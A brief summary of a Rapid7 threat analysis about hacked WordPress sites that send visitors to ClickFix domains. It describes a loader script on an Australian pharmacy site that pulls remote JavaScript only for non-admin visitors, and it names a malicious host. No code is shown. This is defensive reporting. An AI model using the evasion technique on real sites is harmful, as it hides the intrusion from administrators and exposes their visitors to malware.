The analysis uncovered malicious activity involving compromised WordPress websites that were redirecting users to ClickFix domains for ad injection and potential data collection. A loader script was found on an Australian pharmacy site designed to inject JavaScript from remote servers when a user is not logged in as an admin. The script attempted to fetch code from several encoded endpoints, one of which was successfully retrieved from goveanrs.org. This method allowed the attackers to hide their activity from administrators and potentially spread malware or ads without detection. Additionally, compromised sites were found hosting ClickFix JavaScript directly on their servers via a specific AJAX endpoint. No common vulnerabilities in plugins or WordPress versions were identified across affected sites, suggesting that the compromise may have occurred through various means such as weak passwords, outdated software, or other security lapses.
Read the full article at Rapid7 Blog
Want to create content about this topic? Use Nemati AI tools to generate articles, social posts, and more.
